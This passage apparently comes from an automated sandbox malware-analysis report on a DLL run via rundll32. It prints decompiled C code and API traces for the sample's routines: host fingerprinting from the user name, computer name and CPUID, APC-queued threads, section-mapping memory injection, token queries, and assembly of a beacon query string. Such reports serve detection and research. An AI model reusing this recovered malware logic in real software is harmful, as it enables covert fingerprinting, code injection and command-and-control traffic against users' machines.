FindClose.KERNELBASE(00A19865), ref: 00A18057
HeapFree.KERNEL32(00000000,00A13FAE,73797325), ref: 00A18069
HeapFree.KERNEL32(00000000,?), ref: 00A18079

Strings

Uxt, xrefs: 00A18069, 00A18079

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID: Uxt
API String ID: 455834338-1536154274
Opcode ID: af3175bd003216bb5a982eb4967ad49339bb0a6cfb502cf71763493adcfbc8de
Instruction ID: 12536e32becd4d92c40947c2c32672b83d97dfb554c4f3d121eac933ade27907
Opcode Fuzzy Hash: af3175bd003216bb5a982eb4967ad49339bb0a6cfb502cf71763493adcfbc8de
Instruction Fuzzy Hash: 5D814772900119EFDB11DFA5DC84AEEBBB9FB48300F10446AE511E6260E7359A86CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41000, Relevance: 24.1, APIs: 16, Instructions: 126
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E6FC41000(intOrPtr _a4) {
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				long _v60;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				void* _t28;
				long _t31;
				long _t32;
				void* _t41;
				intOrPtr _t43;
				long _t48;
				intOrPtr _t49;
				signed int _t50;
				void* _t57;
				signed int _t61;
				void* _t63;
				intOrPtr* _t64;

				_t21 = E6FC4166F();
				_v52 = _t21;
				if(_t21 != 0) {
					L21:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t50 = 9;
					_t61 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t50;
					_t26 = E6FC418B4(0, _t61); // executed
					_v56 = _t26;
					Sleep(_t61 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L21;
				}
				_t27 = E6FC415F2(_t50); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L19:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L21;
				}
				if(_a4 != 0) {
					L11:
					_t28 = CreateThread(0, 0, __imp__SleepEx,  *0x6fc4414c, 0, 0); // executed
					_t63 = _t28;
					if(_t63 == 0) {
						L18:
						_v56 = GetLastError();
						goto L19;
					}
					_t31 = QueueUserAPC(E6FC4116E, _t63,  &(_v44.wSecond)); // executed
					if(_t31 == 0) {
						_t48 = GetLastError();
						TerminateThread(_t63, _t48);
						CloseHandle(_t63);
						_t63 = 0;
						SetLastError(_t48);
					}
					if(_t63 == 0) {
						goto L18;
					} else {
						_t32 = WaitForSingleObject(_t63, 0xffffffff);
						_v60 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t63,  &_v60);
						}
						CloseHandle(_t63);
						goto L19;
					}
				}
				if(E6FC41B50(_t50,  &_v48) != 0) {
					 *0x6fc44138 = 0;
					goto L11;
				}
				_t49 = _v48;
				_t64 = __imp__GetLongPathNameW;
				_t41 =  *_t64(_t49, 0, 0); // executed
				_t57 = _t41;
				if(_t57 == 0) {
					L9:
					 *0x6fc44138 = _t49;
					goto L11;
				}
				_t15 = _t57 + 2; // 0x2
				_t43 = E6FC41BD2(_t57 + _t15);
				 *0x6fc44138 = _t43;
				if(_t43 == 0) {
					goto L9;
				}
				 *_t64(_t49, _t43, _t57); // executed
				E6FC419CF(_t49);
				goto L11;
			}

0x6fc4100c
0x6fc41015
0x6fc41019
0x6fc4115f
0x6fc41165
0x00000000
0x00000000
0x00000000
0x6fc4101f
0x6fc4101f
0x6fc41024
0x6fc4102a
0x6fc41039
0x6fc4103a
0x6fc4103d
0x6fc41040
0x6fc41049
0x6fc4104d
0x6fc41053
0x6fc41057
0x6fc4105e
0x00000000
0x00000000
0x6fc41064
0x6fc4106b
0x6fc4106f
0x6fc41150
0x6fc41150
0x6fc41157
0x6fc41159
0x6fc41159
0x00000000
0x6fc41157
0x6fc41078
0x6fc410cb
0x6fc410dd
0x6fc410e3
0x6fc410e7
0x6fc41146
0x6fc4114c
0x00000000
0x6fc4114c
0x6fc410f4
0x6fc41102
0x6fc4110a
0x6fc4110e
0x6fc41115
0x6fc41118
0x6fc4111a
0x6fc4111a
0x6fc41122
0x00000000
0x6fc41124
0x6fc41127
0x6fc4112f
0x6fc41133
0x6fc4113b
0x6fc4113b
0x6fc41142
0x00000000
0x6fc41142
0x6fc41122
0x6fc41086
0x6fc410c5
0x00000000
0x6fc410c5
0x6fc41088
0x6fc4108c
0x6fc41095
0x6fc41097
0x6fc4109b
0x6fc410bd
0x6fc410bd
0x00000000
0x6fc410bd
0x6fc4109d
0x6fc410a2
0x6fc410a9
0x6fc410ae
0x00000000
0x00000000
0x6fc410b3
0x6fc410b6
0x00000000

APIs

Part of subcall function 6FC4166F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,6FC41011), ref: 6FC4167E
Part of subcall function 6FC4166F: GetVersion.KERNEL32(?,6FC41011), ref: 6FC4168D
Part of subcall function 6FC4166F: GetCurrentProcessId.KERNEL32(?,6FC41011), ref: 6FC4169C
Part of subcall function 6FC4166F: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,6FC41011), ref: 6FC416B5

GetSystemTime.KERNEL32(?), ref: 6FC41024
SwitchToThread.KERNEL32 ref: 6FC4102A

Part of subcall function 6FC418B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,6FC41045,00000000), ref: 6FC4190A
Part of subcall function 6FC418B4: memcpy.NTDLL(?,6FC41045,?,?,00000000,?,00000000,?,?,?,?,?,?,6FC41045,00000000), ref: 6FC4199C
Part of subcall function 6FC418B4: VirtualFree.KERNELBASE(6FC41045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,6FC41045,00000000), ref: 6FC419B7

Sleep.KERNELBASE(00000000,00000000), ref: 6FC4104D
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6FC41095
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6FC410B3
CreateThread.KERNEL32 ref: 6FC410DD
QueueUserAPC.KERNELBASE(6FC4116E,00000000,?), ref: 6FC410F4
GetLastError.KERNEL32 ref: 6FC41104
TerminateThread.KERNEL32(00000000,00000000), ref: 6FC4110E
CloseHandle.KERNEL32(00000000), ref: 6FC41115
SetLastError.KERNEL32(00000000), ref: 6FC4111A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6FC41127
GetExitCodeThread.KERNEL32(00000000,?), ref: 6FC4113B
CloseHandle.KERNEL32(00000000), ref: 6FC41142
GetLastError.KERNEL32 ref: 6FC41146
GetLastError.KERNEL32 ref: 6FC41159

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
String ID:
API String ID: 2478182988-0
Opcode ID: 60273916d869071bc4b6943f9ab1f5a39268edf74631596d922544390154a242
Instruction ID: 4bb782efc9ea56aad3fd26460d4abdff831dd28267c3c8fb133cb3eb6f245b97
Opcode Fuzzy Hash: 60273916d869071bc4b6943f9ab1f5a39268edf74631596d922544390154a242
Instruction Fuzzy Hash: 81418171504A52AB8712EF79888985BBBB9EEC6774B100A1AFA91C2140F734D528DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00A18B98, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00A18B98(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xa1d228; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00A19067( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xa1d22c ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xa1d1f0, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00A1A93C(_v8 + _v8, _t63);
							}
							HeapFree( *0xa1d1f0, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xa1d1f0, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00A1A93C(_v8 + _v8, _t63);
						}
						HeapFree( *0xa1d1f0, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00a18b98
0x00a18ba0
0x00a18ba6
0x00a18ba9
0x00a18bac
0x00a18bae
0x00a18bb3
0x00a18bb3
0x00a18bb9
0x00a18bbb
0x00a18bc8
0x00a18c29
0x00a18bca
0x00a18bcf
0x00a18bd5
0x00a18bda
0x00a18be8
0x00a18bec
0x00a18bfb
0x00a18c02
0x00a18c09
0x00a18c09
0x00a18c14
0x00a18c14
0x00a18bec
0x00a18bda
0x00a18c2b
0x00a18c31
0x00a18c3b
0x00a18c3d
0x00a18c42
0x00a18c51
0x00a18c55
0x00a18c60
0x00a18c67
0x00a18c6e
0x00a18c6e
0x00a18c7a
0x00a18c7a
0x00a18c55
0x00a18c83
0x00a18c85
0x00a18c88
0x00a18c8a
0x00a18c8d
0x00a18c90
0x00a18c9a
0x00a18c9e
0x00a18ca2

APIs

GetUserNameW.ADVAPI32(00000000,00A1725B), ref: 00A18BCF
RtlAllocateHeap.NTDLL(00000000,00A1725B), ref: 00A18BE6
GetUserNameW.ADVAPI32(00000000,00A1725B), ref: 00A18BF3
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00A1725B,?,?,?,?,?,00A1258B,?,00000001), ref: 00A18C14
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A18C3B
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A18C4F
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A18C5C
HeapFree.KERNEL32(00000000,00000000), ref: 00A18C7A

Strings

Uxt, xrefs: 00A18C14, 00A18C7A

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uxt
API String ID: 3239747167-1536154274
Opcode ID: 7eae919890c0b15d719f9f2fe95d79c54969b11557b399cd6093e85af3944513
Instruction ID: b2f65a465cef399b21acc6a048f3dbbb327d288974d55cf80733dc89c206b169
Opcode Fuzzy Hash: 7eae919890c0b15d719f9f2fe95d79c54969b11557b399cd6093e85af3944513
Instruction Fuzzy Hash: EC310672A00205EFDB10DFA9DC81AEEB7F9FB48314F158469E445D7250EB34EE419B64

Uniqueness

Uniqueness Score: -1.00%

Function 6FC88303, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000078C,00003000,00000040,0000078C,6FC87D60), ref: 6FC883C0
VirtualAlloc.KERNEL32(00000000,000000CE,00003000,00000040,6FC87DBC), ref: 6FC883F7
VirtualAlloc.KERNEL32(00000000,000106D0,00003000,00000040), ref: 6FC88457
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6FC8848D
VirtualProtect.KERNEL32(6FC40000,00000000,00000004,6FC882E2), ref: 6FC88592
VirtualProtect.KERNEL32(6FC40000,00001000,00000004,6FC882E2), ref: 6FC885B9
VirtualProtect.KERNEL32(00000000,?,00000002,6FC882E2), ref: 6FC88686
VirtualProtect.KERNEL32(00000000,?,00000002,6FC882E2,?), ref: 6FC886DC
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6FC886F8

Memory Dump Source

Source File: 00000002.00000002.647783869.000000006FC87000.00000040.00020000.sdmp, Offset: 6FC87000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc87000_rundll32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: da0b3b20743e23ddfc879457dab503a7acf542c8ac365fc628659bae238dc9a3
Instruction ID: 0403604abd840dda314641a7acfd5042e68f69cd633ccae2d79cf925f0c5b970
Opcode Fuzzy Hash: da0b3b20743e23ddfc879457dab503a7acf542c8ac365fc628659bae238dc9a3
Instruction Fuzzy Hash: 28D14A726492019FDB01CF14C884E517BAAFF88314B294695FE19AF69AF771F810CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00A17925, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00A17925(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00A1550F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00A1A07B(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00a17932
0x00a17933
0x00a17934
0x00a17935
0x00a17936
0x00a1793a
0x00a17941
0x00a17950
0x00a17953
0x00a17956
0x00a1795d
0x00a17960
0x00a17963
0x00a17966
0x00a17969
0x00a17974
0x00a17976
0x00a1797f
0x00a17987
0x00a17989
0x00a1799b
0x00a179a5
0x00a179a9
0x00a179b8
0x00a179bc
0x00a179c5
0x00a179cd
0x00a179cd
0x00a179cf
0x00a179cf
0x00a179d7
0x00a179dd
0x00a179e1
0x00a179e1
0x00a179ec

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00A1796C
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00A1797F
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00A1799B

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00A179B8
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00A179C5
NtClose.NTDLL(00000000), ref: 00A179D7
NtClose.NTDLL(00000000), ref: 00A179E1

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 04d5863fff663604d3056ed9ea64f48d90ad9dc4b0a6003df7654d805e540711
Instruction ID: 5e1e27250a3d53df66cfe589bdac767c55c80f0fe88352c68fd178219a71cc06
Opcode Fuzzy Hash: 04d5863fff663604d3056ed9ea64f48d90ad9dc4b0a6003df7654d805e540711
Instruction Fuzzy Hash: 5D2125B2940218BBDF01EFA5CD85ADEBFBDEF08750F108126F901E6121D7718A85DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41C22, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6FC41C22(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6FC41AD1(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6fc41c2b
0x6fc41c32
0x6fc41c33
0x6fc41c34
0x6fc41c35
0x6fc41c36
0x6fc41c47
0x6fc41c4b
0x6fc41c5f
0x6fc41c62
0x6fc41c65
0x6fc41c6c
0x6fc41c6f
0x6fc41c76
0x6fc41c79
0x6fc41c7c
0x6fc41c7f
0x6fc41c84
0x6fc41cbf
0x6fc41c86
0x6fc41c89
0x6fc41c8f
0x6fc41c94
0x6fc41c98
0x6fc41cb6
0x6fc41c9a
0x6fc41ca1
0x6fc41caf
0x6fc41caf
0x6fc41c98
0x6fc41cc7

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,00000002), ref: 6FC41C7F

Part of subcall function 6FC41AD1: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6FC41C94,00000002,00000000,?,?,00000000,?,?,6FC41C94,?), ref: 6FC41AFE

memset.NTDLL ref: 6FC41CA1

Strings

@, xrefs: 6FC41C6F

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
Instruction ID: 2d520662bf5bdd804783c8050f286e2f7cc54abd5a070ace5d83e6111b4eb8b2
Opcode Fuzzy Hash: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
Instruction Fuzzy Hash: B6211F71D00209AFDB01CFA9C9849DEFBF9FF48354F104529E655F7210E7309A588BA4

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41AD1, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6FC41AD1(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6fc41ae3
0x6fc41ae9
0x6fc41af7
0x6fc41afe
0x6fc41b03
0x6fc41b09
0x00000000
0x6fc41b0a
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6FC41C94,00000002,00000000,?,?,00000000,?,?,6FC41C94,?), ref: 6FC41AFE

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 17eb47915d3fbd7605afc763d62fdfc1046f2f5a2ebf783caf70d14272feb7ed
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: DBF037B590420CFFEB119FA9DC85C9FBBBDEB44355B104939F152E1090E6309E188B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A190BA, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 266
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00A190BA(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				void* _t72;
				intOrPtr _t73;
				int _t76;
				void* _t77;
				intOrPtr _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				intOrPtr _t108;
				void* _t110;
				intOrPtr _t115;
				signed int _t119;
				char** _t121;
				int _t124;
				signed int _t126;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr _t136;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t143;
				int _t146;
				void* _t147;
				void* _t148;
				void* _t158;
				int _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t165;
				void* _t167;
				long _t171;
				intOrPtr* _t172;
				intOrPtr* _t175;
				void* _t176;
				void* _t178;
				void* _t179;
				void* _t184;

				_t158 = __edx;
				_t148 = __ecx;
				_t64 = __eax;
				_t147 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t64 = GetTickCount();
				}
				_t65 =  *0xa1d018; // 0x9b3d54d7
				asm("bswap eax");
				_t66 =  *0xa1d014; // 0x5cb11ae7
				asm("bswap eax");
				_t67 =  *0xa1d010; // 0x15dc9586
				asm("bswap eax");
				_t68 =  *0xa1d00c; // 0xf5f4113d
				asm("bswap eax");
				_t69 =  *0xa1d230; // 0x4a6a5a8
				_t3 = _t69 + 0xa1e622; // 0x74666f73
				_t161 = wsprintfA(_t147, _t3, 3, 0x3d13b, _t68, _t67, _t66, _t65,  *0xa1d02c,  *0xa1d004, _t64);
				_t72 = E00A17C63();
				_t73 =  *0xa1d230; // 0x4a6a5a8
				_t4 = _t73 + 0xa1e662; // 0x74707526
				_t76 = wsprintfA(_t161 + _t147, _t4, _t72);
				_t178 = _t176 + 0x38;
				_t162 = _t161 + _t76;
				if(_a8 != 0) {
					_t143 =  *0xa1d230; // 0x4a6a5a8
					_t8 = _t143 + 0xa1e66d; // 0x732526
					_t146 = wsprintfA(_t162 + _t147, _t8, _a8);
					_t178 = _t178 + 0xc;
					_t162 = _t162 + _t146;
				}
				_t77 = E00A14930(_t148);
				_t78 =  *0xa1d230; // 0x4a6a5a8
				_t10 = _t78 + 0xa1e38a; // 0x6d697426
				_t163 = _t162 + wsprintfA(_t162 + _t147, _t10, _t77, _t158);
				_t82 =  *0xa1d230; // 0x4a6a5a8
				_t12 = _t82 + 0xa1e7b4; // 0x5488d5c
				_t184 = _a4 - _t12;
				_t14 = _t82 + 0xa1e33b; // 0x74636126
				_t160 = 0 | _t184 == 0x00000000;
				_t164 = _t163 + wsprintfA(_t163 + _t147, _t14, _t184 == 0);
				_t86 =  *0xa1d278; // 0x54895e0
				_t179 = _t178 + 0x1c;
				if(_t86 != 0) {
					_t139 =  *0xa1d230; // 0x4a6a5a8
					_t18 = _t139 + 0xa1e8ea; // 0x3d736f26
					_t142 = wsprintfA(_t164 + _t147, _t18, _t86);
					_t179 = _t179 + 0xc;
					_t164 = _t164 + _t142;
				}
				_t87 =  *0xa1d284; // 0x54895b0
				if(_t87 != 0) {
					_t136 =  *0xa1d230; // 0x4a6a5a8
					_t20 = _t136 + 0xa1e685; // 0x73797326
					wsprintfA(_t164 + _t147, _t20, _t87);
					_t179 = _t179 + 0xc;
				}
				_t165 =  *0xa1d2d4; // 0x5489630
				_t89 = E00A166E0(0xa1d00a, _t165 + 4);
				_t171 = 0;
				_v12 = _t89;
				if(_t89 == 0) {
					L28:
					HeapFree( *0xa1d1f0, _t171, _t147);
					return _a20;
				} else {
					_t92 = RtlAllocateHeap( *0xa1d1f0, 0, 0x800);
					_a8 = _t92;
					if(_t92 == 0) {
						L27:
						HeapFree( *0xa1d1f0, _t171, _v12);
						goto L28;
					}
					E00A128E3(GetTickCount());
					_t96 =  *0xa1d2d4; // 0x5489630
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0xa1d2d4; // 0x5489630
					__imp__(_t100 + 0x40);
					_t102 =  *0xa1d2d4; // 0x5489630
					_t167 = E00A149EC(1, _t160, _t147,  *_t102);
					_v20 = _t167;
					asm("lock xadd [eax], ecx");
					if(_t167 == 0) {
						L26:
						HeapFree( *0xa1d1f0, _t171, _a8);
						goto L27;
					}
					StrTrimA(_t167, 0xa1c2c4);
					_t108 =  *0xa1d230; // 0x4a6a5a8
					_push(_t167);
					_t24 = _t108 + 0xa1e2d2; // 0x53002f
					_t110 = E00A19FA4(_t24);
					_v8 = _t110;
					if(_t110 == 0) {
						L25:
						HeapFree( *0xa1d1f0, _t171, _t167);
						goto L26;
					}
					 *_t167 = 0;
					__imp__(_a8, _v12);
					_t172 = __imp__;
					 *_t172(_a8, _v8);
					 *_t172(_a8, _t167);
					_t115 = E00A18DEA(0, _a8);
					_a4 = _t115;
					if(_t115 == 0) {
						_a20 = 8;
						L23:
						E00A154F9();
						L24:
						HeapFree( *0xa1d1f0, 0, _v8);
						_t171 = 0;
						goto L25;
					}
					_t119 = E00A14759(_t147, 0xffffffffffffffff, _t167,  &_v16); // executed
					_a20 = _t119;
					if(_t119 == 0) {
